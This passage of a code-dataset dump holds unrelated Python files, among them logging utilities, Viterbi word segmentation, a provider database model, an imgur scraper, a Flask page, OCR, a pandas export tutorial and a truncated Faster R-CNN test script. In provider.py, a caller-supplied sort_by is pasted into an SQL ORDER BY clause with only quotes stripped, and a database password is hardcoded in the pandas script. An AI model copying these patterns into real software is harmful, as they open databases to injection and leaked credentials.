logger.debug(msg)\n\n\ndef log_info(message, **params):\n msg = logfmt(dict(message=message, **params))\n if _console_log_level() in ['debug', 'info']:\n print(msg, file=sys.stderr)\n logger.info(msg)\n\n\ndef _test_or_live_environment():\n if oriskami.api_key is None:\n return\n match = re.match(r'sk_(live|test)_', oriskami.api_key)\n if match is None:\n return\n return match.groups()[0]\n\n\ndef dashboard_link(request_id):\n return 'https://dashboard.oriskami.com/{env}/logs/{reqid}'.format(\n env=_test_or_live_environment() or 'test',\n reqid=request_id,\n )\n\n\ndef logfmt(props):\n def fmt(key, val):\n # Check if val is already a string to avoid re-encoding into\n # ascii. Since the code is sent through 2to3, we can't just\n # use unicode(val, encoding='utf8') since it will be\n # translated incorrectly.\n if re.search(r'\\s', str(val)):\n val = repr(val)\n # key should already be a string\n if re.search(r'\\s', key):\n key = repr(key)\n return u'{key}={val}'.format(key=key, val=val)\n return u' '.join([fmt(key, val) for key, val in sorted(props.items())])\n\n\n# Borrowed from Django's source code\nif hasattr(hmac, 'compare_digest'):\n # Prefer the stdlib implementation, when available.\n def secure_compare(val1, val2):\n return hmac.compare_digest(utf8(val1), utf8(val2))\nelse:\n def secure_compare(val1, val2):\n \"\"\"\n Returns True if the two strings are equal, False otherwise.\n The time taken is independent of the number of characters that match.\n For the sake of simplicity, this function executes in constant time\n only when the two strings have the same length. It short-circuits when\n they have different lengths.\n \"\"\"\n val1, val2 = utf8(val1), utf8(val2)\n if len(val1) != len(val2):\n return False\n result = 0\n if (sys.version_info[0] == 3 and isinstance(val1, bytes) and\n isinstance(val2, bytes)):\n for x, y in zip(val1, val2):\n result |= x ^ y\n else:\n for x, y in zip(val1, val2):\n result |= ord(x) ^ ord(y)\n return result == 0\n","sub_path":"oriskami/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"423821231","text":"import random\n\nif __name__ == \"__main__\":\n\n metodos = [1, 2, 3]\n quantidades = [100, 1000, 10000, 100000, 471705]\n situacoes = [1, 2, 3]\n\n intercalacao_Ffitas = open(\n \"../../input/IntercalacaoFfitas/testes.txt\",\n \"w\",\n )\n intercalacao_2Ffitas = open(\n \"../../input/Intercalacao2Ffitas/testes.txt\",\n \"w\",\n )\n QuickExterno = open(\n \"../../input/QuicksortExterno/testes.txt\",\n \"w\",\n )\n\n for metodo in metodos:\n for situacao in situacoes:\n for quantidade in quantidades:\n\n if metodo == 1:\n intercalacao_2Ffitas.write(\n f\"./ordena {metodo} {quantidade} {situacao}\\n\"\n )\n\n elif metodo == 2:\n intercalacao_Ffitas.write(\n f\"./ordena {metodo} {quantidade} {situacao}\\n\"\n )\n elif metodo == 3:\n QuickExterno.write(f\"./ordena {metodo} {quantidade} {situacao}\\n\")\n\n intercalacao_Ffitas.close()\n intercalacao_2Ffitas.close()\n QuickExterno.close()\n","sub_path":"UFOP/Disciplinas/Terceiro Periodo/Estrutura de Dados II/TP2_20.2/scripts/InputsGenerator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"616825865","text":"import os\nfrom collections import defaultdict\nimport sys\nimport math\nimport json\nimport shutil\nimport nGram\nimport subprocess\n\ndef ViterbiDivision(path):\n with open(path, \"r\") as f:\n with open(\"out.word\", \"w\") as fo:\n for line in f:\n line = line.strip()\n Graph = {}\n # create a graph\n for i in range(0, len(line)):\n tG = {}\n for j in range(i+1, len(line)+1):\n qw = line[i:j]\n ln = -math.log(nGram.probWord([qw]))\n if ln > math.log(nGram.nVirtualWords):\n ln = ln*len(qw) # this is an unknown word. multiply length to restrict the length of unknown words to 1 on Viterbi algorithm.\n\n tG[j] = ln\n\n Graph[i] = tG\n # Excute Viterbi algorithm.\n best_score = {}\n best_edge = {}\n best_score[0] = 0\n for i in range(1, len(line)+1):\n best_score[i] = math.inf\n for j in range(0, i):\n score = best_score[j] + Graph[j][i]\n if score < best_score[i]:\n best_score[i] = score\n best_edge[i] = j\n words = []\n i = len(line)\n while True:\n j = best_edge[i]\n words.append(line[j:i])\n i = j\n if i == 0:\n break\n words.reverse()\n\n\n oStr = \"\"\n for w in words:\n oStr = oStr + w + \" \"\n print(oStr, file=fo)\n\n\na = 3\nif a == 1:\n with open(\"../../test/04-model.txt\", \"r\") as f:\n nGram.gN = 1\n nGram.mnGram = nGram.c_nGram(0.98)\n nGram.mnGram.prob = 1/nGram.nVirtualWords\n \n for line in f:\n line = line.strip()\n line = line.split(\"\\t\")\n print(line)\n nGram.mnGram.w_prev[line[0]].prob = float(line[1])\n \n ViterbiDivision(\"../../test/04-input.txt\")\n\nelif a == 2:\n nGram.gN = 1\n nGram.mnGram = nGram.c_nGram(0.95)\n nGram.Train(\"04-train.word\")\n ViterbiDivision(\"04-input.txt\")\n\n\n# test 2, practice of tutorial 3 using a wikipedia dataset.\nelif a == 3:\n nGram.gN = 1\n nGram.nVirtualWords = 1000000\n nGram.mnGram = nGram.c_nGram(0.95)\n nGram.Train(\"../../data/wiki-ja-train.word\")\n ViterbiDivision(\"../../data/wiki-ja-test.txt\")\n subprocess.call([\"perl\", \"../gradews.pl\",\"../../data/wiki-ja-test.word\",\"out.word\"])\n\n # Sent Accuracy: 0.00% (/84)\n # Word Prec: 79.78% (1925/2413)\n # Word Rec: 83.44% (1925/2307)\n # F-meas: 81.57%\n # Bound Accuracy: 88.72% (2862/3226)\nelse:\n with open(\"big-ws-model.txt\", \"r\") as f:\n nGram.gN = 1\n nGram.mnGram = nGram.c_nGram(0.98)\n nGram.mnGram.prob = 1/nGram.nVirtualWords\n \n for line in f:\n line = line.strip()\n line = line.split(\"\\t\")\n nGram.mnGram.w_prev[line[0]].prob = float(line[1])\n\n ViterbiDivision(\"../../data/wiki-ja-test.txt\")\n subprocess.call([\"perl\", \"../gradews.pl\",\"../../data/wiki-ja-test.word\",\"out.word\"])\n # Sent Accuracy: 0.00% (/84)\n # Word Prec: 74.24% (1919/2585)\n # Word Rec: 83.18% (1919/2307)\n # F-meas: 78.45%\n # Bound Accuracy: 86.05% (2776/3226)\n","sub_path":"hShibata/tutorial03/wtest.py","file_name":"wtest.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"605130302","text":"from db import *\nimport datetime\n\n\nclass Provider(object):\n def __init__(self, id_provider=None, db_row=None):\n self.facility_types = []\n self.organization_types = []\n self.specialty_types = []\n \n if db_row != None:\n self.fill_from_data_row(db_row)\n elif id_provider != None:\n rows, _ = self.db_select(id_provider=id_provider)\n if len(rows) == 0:\n raise KeyError(\"row not found\")\n self.fill_from_data_row(rows[0])\n self.fill_types()\n\n def fill_from_data_row(self, row):\n self.id_provider = row[\"id_provider\"]\n self.id_user = row[\"id_member\"]\n self.id_provider_type = row[\"id_provider_type\"]\n self.name = row[\"name\"]\n self.address_street1 = row[\"address_street1\"]\n self.address_street2 = row[\"address_street2\"]\n self.address_zipcode = row[\"address_zipcode\"]\n self.address_city = row[\"address_city\"]\n self.address_state = row[\"address_state\"]\n self.contact_name = row[\"contact_name\"]\n self.email = row[\"email\"]\n self.website = row[\"website\"]\n self.phone_number = row[\"phone_number\"]\n self.doctor_firstname = row[\"doctor_firstname\"]\n self.doctor_lastname = row[\"doctor_lastname\"]\n self.doctor_middlename = row[\"doctor_middlename\"]\n self.doctor_name = row[\"doctor_name\"]\n self.doctor_gender = row[\"doctor_gender\"]\n self.provider_type = row[\"provider_type\"]\n self.specialty_type = row[\"specialty_type\"]\n self.likes = row[\"likes\"]\n \n if row[\"distance_miles\"]:\n self.distance_miles = float(row[\"distance_miles\"])\n else:\n self.distance_miles = None\n\n if row[\"lat\"] and row[\"lng\"]:\n self.lat = float(row[\"lat\"])\n self.lng = float(row[\"lng\"])\n else:\n self.lat = None\n self.lng = None\n\n\n def fill_types(self):\n self.facility_types = []\n\n rows = pg_select_rows(\"select id_facility_type from provider_facility_type where id_provider = %s\", (self.id_provider, ))\n for row in rows:\n self.facility_types.append(row[\"id_facility_type\"])\n\n self.organization_types = []\n\n rows = pg_select_rows(\"select id_organization_type from provider_organization_type where id_provider = %s\", (self.id_provider, ))\n for row in rows:\n self.organization_types.append(row[\"id_organization_type\"]) \n\n self.specialty_types = []\n\n rows = pg_select_rows(\"select id_specialty_type from provider_specialty_type where id_provider = %s\", (self.id_provider, ))\n for row in rows:\n self.specialty_types.append(row[\"id_specialty_type\"]) \n\n\n def insert(self): \n self.id_provider = pg_execute(\"\\\n insert into provider(\\\n id_member,\\\n id_provider_type,\\\n name,\\\n address_street1,\\\n address_street2,\\\n address_zipcode,\\\n address_city,\\\n address_state,\\\n lat,\\\n lng,\\\n contact_name,\\\n email,\\\n website,\\\n phone_number,\\\n doctor_firstname,\\\n doctor_lastname,\\\n doctor_middlename,\\\n doctor_name,\\\n doctor_gender\\\n )\\\n values(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) returning id_provider\", \n (\n self.id_user,\n self.id_provider_type,\n self.name,\n self.address_street1,\n self.address_street2,\n self.address_zipcode,\n self.address_city,\n self.address_state,\n self.lat,\n self.lng,\n self.contact_name,\n self.email,\n self.website,\n self.phone_number,\n self.doctor_firstname,\n self.doctor_lastname,\n self.doctor_middlename,\n self.doctor_name,\n self.doctor_gender\n ))\n\n self.save_types()\n\n\n def update(self):\n pg_execute(\"\\\n update\\\n provider\\\n set\\\n id_member = %s,\\\n id_provider_type = %s,\\\n name = %s,\\\n address_street1 = %s,\\\n address_street2 = %s,\\\n address_zipcode = %s,\\\n address_city = %s,\\\n address_state = %s,\\\n lat = %s,\\\n lng = %s,\\\n contact_name = %s,\\\n email = %s,\\\n website = %s,\\\n phone_number = %s,\\\n doctor_firstname = %s,\\\n doctor_lastname = %s,\\\n doctor_middlename = %s,\\\n doctor_name = %s,\\\n doctor_gender = %s,\\\n likes = %s\\\n where\\\n id_provider = %s\",\n (\n self.id_user,\n self.id_provider_type,\n self.name,\n self.address_street1,\n self.address_street2,\n self.address_zipcode,\n self.address_city,\n self.address_state,\n self.lat,\n self.lng,\n self.contact_name,\n self.email,\n self.website,\n self.phone_number,\n self.doctor_firstname,\n self.doctor_lastname,\n self.doctor_middlename,\n self.doctor_name,\n self.doctor_gender,\n self.likes,\n self.id_provider))\n\n self.save_types()\n\n def delete(self): \n pg_execute(\"delete from provider where id_provider = %s\", (self.id_provider, ))\n\n def reload(self):\n rows, _ = self.db_select(id_provider=self.id_provider)\n self.fill_from_data_row(rows[0])\n\n def save_types(self):\n pg_execute(\"delete from provider_facility_type where id_provider = %s\", (self.id_provider, ))\n pg_execute(\"delete from provider_organization_type where id_provider = %s\", (self.id_provider, ))\n pg_execute(\"delete from provider_specialty_type where id_provider = %s\", (self.id_provider, ))\n\n for id in self.facility_types:\n pg_execute(\"insert into provider_facility_type(id_provider, id_facility_type) values (%s, %s)\", (self.id_provider, id))\n\n for id in self.organization_types:\n pg_execute(\"insert into provider_organization_type(id_provider, id_organization_type) values (%s, %s)\", (self.id_provider, id))\n \n for id in self.specialty_types:\n pg_execute(\"insert into provider_specialty_type(id_provider, id_specialty_type) values (%s, %s)\", (self.id_provider, id))\n \n # @staticmethod\n # def like(id_provider):\n # rows = pg_select_rows(\"select id_provider from provider where id_provider = %s\", (id_provider, ))\n \n # if len(rows) == 0:\n # return None\n\n # pg_execute(\"update provider set likes = likes + 1 where id_provider = %s\", (id_provider, ))\n \n # return Provider(id_provider=id_provider)\n \n\n @staticmethod\n def db_select(id_provider = None,\n location_lat = None,\n location_lng = None,\n location_distance = None,\n name = None,\n id_provider_type = None,\n id_specialty_type = None,\n id_facility_type = None,\n id_organization_type = None,\n id_user = None,\n sort_by = None,\n results_page = None,\n results_page_size = None):\n\n order_string=\" order by case when p.lat is null or p.lng is null then 2 else 1 end, distance_miles, coalesce(concat(p.doctor_lastname, ' ', coalesce(p.doctor_middlename, ''), ' ', p.doctor_firstname), p.name), p.id_provider\"\n\n if sort_by:\n sort_by_sanitized=sort_by.replace(\"'\", \"\").replace('\"', '')\n order_string=\" order by {0}, p.id_provider\".format(sort_by_sanitized)\n\n limit_string=\"\"\n\n if results_page and results_page_size:\n start_record=(results_page - 1) * results_page_size\n limit_string=\" offset {0} limit {1}\".format(\n int(start_record), int(results_page_size))\n else:\n limit_string = \" limit 2\"\n\n if name:\n name = \"%{0}%\".format(name)\n\n return pg_select_rows_with_count(\"\\\n select\\\n count(*) over() as row_count,\\\n p.id_provider,\\\n p.id_provider_type,\\\n p.name,\\\n p.address_street1,\\\n p.address_street2,\\\n p.address_zipcode,\\\n p.address_city,\\\n p.address_state,\\\n p.lat,\\\n p.lng,\\\n p.contact_name,\\\n p.email,\\\n p.website,\\\n p.phone_number,\\\n p.doctor_firstname,\\\n p.doctor_lastname,\\\n p.doctor_middlename,\\\n p.doctor_name,\\\n p.doctor_gender,\\\n p.id_member,\\\n p.likes,\\\n pt.name as provider_type,\\\n (select string_agg(name, ', ') from specialty_type st inner join provider_specialty_type pst on pst.id_specialty_type = st.id_specialty_type where pst.id_provider = p.id_provider) as specialty_type,\\\n case when %(location_lat)s is null or %(location_lng)s is null then 0 else ST_Distance(st_makepoint(%(location_lat)s, %(location_lng)s)::geography, st_makepoint(p.lat, p.lng)::geography) / 1609.34 end as distance_miles\\\n from\\\n provider p\\\n inner join\\\n provider_type pt on pt.id_provider_type = p.id_provider_type\\\n left join\\\n member m on m.id_member = %(id_user)s\\\n where\\\n (%(id_provider)s is null or p.id_provider = %(id_provider)s)\\\n and (%(id_user)s is null or p.id_member = %(id_user)s or m.id_member_role = 1)\\\n and (%(id_provider_type)s is null or p.id_provider_type = %(id_provider_type)s)\\\n and (%(id_organization_type)s is null or %(id_organization_type)s in (select pot.id_organization_type from provider_organization_type pot where pot.id_provider = p.id_provider))\\\n and (%(id_facility_type)s is null or %(id_facility_type)s in (select pft.id_facility_type from provider_facility_type pft where pft.id_provider = p.id_provider))\\\n and (%(id_specialty_type)s is null or %(id_specialty_type)s in (select pst.id_specialty_type from provider_specialty_type pst where pst.id_provider = p.id_provider))\\\n and (%(name)s is null or %(name)s = '' or p.name ilike %(name)s or p.doctor_name ilike %(name)s)\\\n and (%(location_lat)s is null or %(location_lng)s is null or %(location_distance)s is null or case when %(location_lat)s is null or %(location_lng)s is null then 0 else ST_Distance(st_makepoint(%(location_lat)s, %(location_lng)s)::geography, st_makepoint(p.lat, p.lng)::geography) / 1609.34 end <= %(location_distance)s)\\\n {0} {1}\\\n \".format(order_string, limit_string),\n {\"id_provider\": id_provider,\n \"id_provider_type\": id_provider_type,\n \"id_organization_type\": id_organization_type,\n \"id_facility_type\": id_facility_type,\n \"id_specialty_type\": id_specialty_type,\n \"name\": \"%{0}%\".format(name) if name != None and name != '' else None,\n \"location_lat\": location_lat,\n \"location_lng\": location_lng,\n \"location_distance\": location_distance,\n \"id_user\": id_user}\n )\n\n @staticmethod\n def get_providers(location_lat=None,\n location_lng=None,\n location_distance=None,\n name=None,\n id_provider_type=None,\n id_specialty_type=None,\n id_facility_type=None,\n id_organization_type=None,\n id_user=None,\n sort_by=None,\n results_page=None,\n results_page_size=None):\n\n providers = []\n\n rows, row_count = Provider.db_select(\n location_lat=location_lat,\n location_lng=location_lng,\n location_distance=location_distance,\n name=name,\n id_provider_type=id_provider_type,\n id_specialty_type=id_specialty_type,\n id_facility_type=id_facility_type,\n id_organization_type=id_organization_type,\n id_user=id_user,\n sort_by=sort_by,\n results_page=results_page,\n results_page_size=results_page_size)\n\n for row in rows:\n provider = Provider()\n provider.fill_from_data_row(row)\n providers.append(provider)\n\n return providers, row_count\n","sub_path":"api/model/provider.py","file_name":"provider.py","file_ext":"py","file_size_in_byte":12953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"409723023","text":"#! python3\n# imgurSearch.py\n# Opens the first five images corresponding to the user-inputted search terms\n\nimport logging, webbrowser, sys, requests, bs4\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n# Search imgur for search terms\nres = requests.get('http://imgur.com/search/score?q=' + ' '.join(sys.argv[1:]))\nres.raise_for_status\n\n# Grab HTML\nsoup = bs4.BeautifulSoup(res.text)\n\n# Select elements with the image-list-link class\nimageLinks = soup.select('.image-list-link')\n\n# Determine the number of links to open\nnumOpen = min(5, len(imageLinks))\n\n# Open links\nfor i in range(numOpen):\n webbrowser.open('imgur.com' + imageLinks[i].get('href'))\n\n\n\n\n\n\n\n\n\n","sub_path":"imgurSearch.py","file_name":"imgurSearch.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"534508775","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0018_daily_evangel_report_service'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='evangel_diary',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('content', models.TextField(default=b'')),\n ('created', models.DateTimeField(default=django.utils.timezone.now, editable=False)),\n ('members', models.ForeignKey(to='api.members')),\n ],\n ),\n ]\n","sub_path":"api/migrations/0019_evangel_diary.py","file_name":"0019_evangel_diary.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"100537224","text":"from flask import Flask, render_template\n\napp = Flask(__name__)\n\nusers = {\n 'trang' : {\n 'name': 'Trang',\n 'age': 19,\n 'pet': '1 dog'\n },\n 'xuxu123' : {\n 'name': 'Anh',\n 'age': 99,\n 'pet': '2 turtles'\n },\n 'kiki345' : {\n 'name': 'Ly',\n 'age': 10,\n 'pet': 'None'\n }\n}\n\n@app.route('/user/')\ndef info(username):\n if username in users:\n usr = users[username]\n return render_template('user.html', USER = usr)\n else:\n return 'User not found'\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"lesson7/hw/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"192134104","text":"# Text recognition from images using Pytesseract lib\n\nimport pytesseract\npytesseract.pytesseract.tesseract_cmd = r'D:\\installations\\pytesseract\\inst\\Tesseract-OCR\\tesseract.exe'\nimport cv2\nfrom PIL import Image\nimport tensorflow as tf\n\n# Read and display image\nimage = cv2.imread('sample3.jpg')\nimg_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n# Some functions of tesseract\nprint(pytesseract.image_to_string(img_rgb)) # Prints out the text\nprint(pytesseract.get_languages(config='')) # List of available languages\n\n#--------- Prints out the letters and corresponding coordinates and create BB around them ------\n\nprint(pytesseract.image_to_boxes(img_rgb)) # Prints out the letters and corresponding coordinates\nbounding_box_coordinates = pytesseract.image_to_boxes(img_rgb)\nimage_h, image_w, _ = img_rgb.shape\nfor bounding_box in bounding_box_coordinates.splitlines():\n print(type(bounding_box)) # string class\n print(bounding_box)\n bounding_box = bounding_box.split(' ')\n x1,y1,x2,y2 = int(bounding_box[1]), int(bounding_box[2]),int(bounding_box[3]),int(bounding_box[4])\n\n cv2.rectangle(img_rgb, (x1,image_h-y1), (x2,image_h-y2), (0,0,255), thickness=3)\n\ncv2.namedWindow('image', flags=cv2.WINDOW_NORMAL) # WINDOW_NORMAL or WINDOW_AUTOSIZE\ncv2.imshow('image', img_rgb)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"pytesseract_text_recogn.py","file_name":"pytesseract_text_recogn.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"536726036","text":"#Escreva um programa que leia um número inteiro (variável limite), um incremento (variável salto) e\n#imprima os números inteiros de 0 até limite inclusive, com incremento de salto. Admita que limite e\n#salto são maiores que zero. Exemplos:\n#▪ Valores lidos: 30 (limite) 5 (salto)\n#▪ Resultado do algoritmo: 0 5 10 15 20 25 30\n#▪ Valores lidos: 10 (limite) 3 (salto)\n#▪ Resultado do algoritmo: 0 3 6 9\n\nnumint=int(input(\"Insira um numero inteiro:\"))\nincr=int(input(\"Insira um incremento:\"))\n\nfor u in range(0, numint+1, incr):\n print(u)\n","sub_path":"exe3.py","file_name":"exe3.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"83335748","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 3 08:22:39 2019\n\n@author: edwin\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 08:20:37 2019\n\n@author: edwin\n\"\"\"\n\nimport pandas as pd\nimport os\nimport numpy as np\nimport sqlite3\nimport mysql\n\n\n# El pandas permite leer JSON, CSV, HTML, XML....\n# Archivos binarios\n\npath = './data/artwork_data.csv'\n\ncolumnas = ['id', 'artist', 'title', 'medium', 'year', \n 'acquisitionYear', 'height', 'width', 'units']\n\ndf = pd.read_csv(path, nrows = 10)\n\ndf2 = pd.read_csv(path, nrows=10, usecols=columnas)\n\ndf3 = pd.read_csv(path, nrows=10, usecols=columnas, index_col = 'id')\n\ndf4 = pd.read_csv(path)\n\npath_guardado = './data/artwork_data.pickle'\npath_guardado_complete = './data/artwork_data_complete.pickle'\n\ndf3.to_pickle(path_guardado)\ndf4.to_pickle(path_guardado_complete)\ndf5 = pd.read_pickle(path_guardado)\n\n\n\n##############\n\npath_guardado = './data/artwork_data.pickle'\ndf5 = pd.read_pickle(path_guardado)\n\n\npath = './data/artwork_data.csv'\npath_archivo_guardado = 'mi_datafame_completo.xls'\ndf4 = pd.read_csv(path)\n\ndf = df4.iloc[4990:50019,:].copy()\n\ndf.to_excel(path_archivo_guardado, index = False)\n\n# queremos mostrar ciertas columnas\ncolumnas = ['artist', 'title', 'year']\ndf.to_excel(path_archivo_guardado, columns = columnas ,index = False)\n\n\n# multiples hojas\npath_multiple = 'mi_datafame_completo_multiple.xls'\n\nwriter = pd.ExcelWriter(path_multiple, engine = 'xlsxwriter')\n\n#definimos nuestras hojas\ndf.to_excel(writer, sheet_name = 'Primera')\ndf.to_excel(writer, sheet_name = 'Segunda', index = False)\ndf.to_excel(writer, sheet_name = 'Tercera', columns = columnas)\nwriter.save()\n\n\n\n# nuero de artistas\nnum_artistas = df['artist'].value_counts()\n\n\n# colotes\npath_colores = 'mi_datafame_completo_colores.xls'\nwriter = pd.ExcelWriter(path_colores, engine = 'xlsxwriter')\nnum_artistas.to_excel(writer, sheet_name = 'Artistas')\n\nhoja_de_artistas = writer.sheets['Artistas']\n\nrango_de_celdas = 'B2:B{}'.format(len(num_artistas.index) + 1)\n\n#crear el formato que le queremos dar\nformato_artistas = {\n \"type\": \"2_color_scale\",\n \"min_value\": \"10\",\n \"min_type\": \"percentile\",\n \"max_type\": \"percentile\",\n \"max_value\": \"99\"\n }\n\nhoja_de_artistas.conditional_format(rango_de_celdas, formato_artistas)\nwriter.save()\n\n\n\n\n\nimport xlsxwriter\n\nexcel_grafico = xlsxwriter.Workbook('excel_graficas.xlsx')\nworksheet = excel_grafico.add_worksheet()\n\ndata = num_artistas.values\nworksheet.write_column('A1', data)\n\nchart = excel_grafico.add_chart({'type': 'line'})\n\nchart.add_series({'values': '=Sheet1!$A$1:$A$6'})\n\nworksheet.insert_chart('C1', chart)\n\nexcel_grafico.close()\n\n\n\n\n\n\n\n\n\n\n\n\n######## Exportar a base de datos\n\n\n\nwith sqlite3.connect('bbd_artist.bd') as conexion: \n df4.to_sql('py_artistas', conexion)\n \n \n## Exportar a mysql\n \nimport mysql.connector\nwith mysql.connect('mysql://edwin:123456@localhost:32771/test') as conexion:\n df4.to_sql('tabla_mysql', conexion)\n \n \n \n \n### JSON #######\n\ndf2.to_json('artista.json', orient='table')\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"08-pandas/E_Output_Data.py","file_name":"E_Output_Data.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"501540083","text":"# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Jiasen Lu, Jianwei Yang, based on code from Ross Girshick\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport numpy as np\nimport pprint\nimport time\nimport _init_paths\n\nimport torch\n\nfrom torch.autograd import Variable\nimport pickle\nfrom roi_data_layer.roidb import combined_roidb\nfrom roi_data_layer.roibatchLoader import roibatchLoader\nfrom model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir\nfrom model.rpn.bbox_transform import clip_boxes\nfrom model.nms.nms_wrapper import nms\nfrom model.rpn.bbox_transform import bbox_transform_inv\nfrom model.utils.net_utils import save_net, load_net, vis_detections\nfrom model.utils.parser_func import parse_args, set_dataset_args, set_dataset_test_on_target_train\nfrom datasets.food_category import get_categories\nfrom model.faster_rcnn.vgg16_global_local import vgg16\nfrom model.faster_rcnn.resnet_global_local import resnet\nfrom model.faster_rcnn.prefood_res50_attention import PreResNet50Attention\nfrom model.faster_rcnn.vgg16_global_local_weakly import vgg16_weakly\nfrom model.faster_rcnn.resnet_global_local_weakly import resnet_weakly\nfrom model.faster_rcnn.vgg16_global_local_weakly_sum import vgg16_weakly_sum\nfrom model.faster_rcnn.resnet_global_local_unreversed import resnet_local_unreversed\nfrom model.faster_rcnn.vgg16_multiscale import vgg16_multiscale\nfrom model.faster_rcnn.faster_rcnn_global_local_backbone import FasterRCNN\nfrom model.faster_rcnn.faster_rcnn_weakly_backbone import FasterRCNN_Weakly\nfrom datasets.id2name import id2chn, id2eng\nimport cv2\nimport pdb\n\ntry:\n xrange # Python 2\nexcept NameError:\n xrange = range # Python 3\n\n\nlr = cfg.TRAIN.LEARNING_RATE\nmomentum = cfg.TRAIN.MOMENTUM\nweight_decay = cfg.TRAIN.WEIGHT_DECAY\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n print('Called with args:')\n print(args)\n\n # set dataset : public dataset or food\n\n # public dataset\n args = set_dataset_args(args, test=True)\n #args = set_dataset_test_on_target_train(args)\n\n test_dataset = args.imdbval_name\n\n test_canteen = test_dataset.split('_')[1]\n\n args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]',\n 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '20']\n args.cfg_file = \"cfgs/{}_ls.yml\".format(\n args.net) if args.large_scale else \"cfgs/{}.yml\".format(args.net)\n\n if torch.cuda.is_available() and not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n np.random.seed(cfg.RNG_SEED)\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n print('Using config:')\n pprint.pprint(cfg)\n\n cfg.TRAIN.USE_FLIPPED = False\n imdb, roidb, ratio_list, ratio_index = combined_roidb(\n test_dataset, False)\n imdb.competition_mode(on=True)\n\n print('{:d} roidb entries'.format(len(roidb)))\n\n # initilize the network here.\n\n # if args.net == 'vgg16':\n # fasterRCNN = vgg16(imdb.classes, pretrained=True,\n # class_agnostic=args.class_agnostic, lc=args.lc, gc=args.gc)\n\n # elif args.net == 'vgg16_multiscale':\n # fasterRCNN = vgg16_multiscale(imdb.classes, pretrained=False,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc,\n # gc=args.gc)\n\n # elif args.net == 'res101':\n # fasterRCNN = resnet(imdb.classes, 101, pretrained=True,\n # class_agnostic=args.class_agnostic, lc=args.lc, gc=args.gc)\n\n # elif args.net == 'res101_local_unreversed':\n # fasterRCNN = resnet_local_unreversed(imdb.classes, 101, pretrained=True,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc, gc=args.gc)\n\n # elif args.net == 'prefood':\n # fasterRCNN = PreResNet50Attention(imdb.classes, pretrained=True,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc, gc=args.gc)\n\n # elif args.net == 'vgg16_weakly':\n # fasterRCNN = vgg16_weakly(imdb.classes, pretrained=True,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc,\n # gc=args.gc)\n\n # elif args.net == 'vgg16_weakly_sum':\n # fasterRCNN = vgg16_weakly_sum(imdb.classes, pretrained=True,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc,\n # gc=args.gc)\n\n # elif args.net == 'res50':\n # fasterRCNN = resnet(imdb.classes, 50, pretrained=True, class_agnostic=args.class_agnostic,context=args.context)\n # else:\n # print(\"network is not defined\")\n # pdb.set_trace()\n\n fasterRCNN = FasterRCNN_Weakly(imdb.classes,\n class_agnostic=args.class_agnostic,\n lc=args.lc, gc=args.gc,\n backbone_type='res101',\n weakly_type=args.weakly_type)\n fasterRCNN.create_architecture()\n\n print(\"load checkpoint %s\" % (args.load_name))\n checkpoint = torch.load(args.load_name)\n fasterRCNN.load_state_dict(checkpoint['model'], strict=False)\n if 'pooling_mode' in checkpoint.keys():\n cfg.POOLING_MODE = checkpoint['pooling_mode']\n\n print('load model successfully!')\n 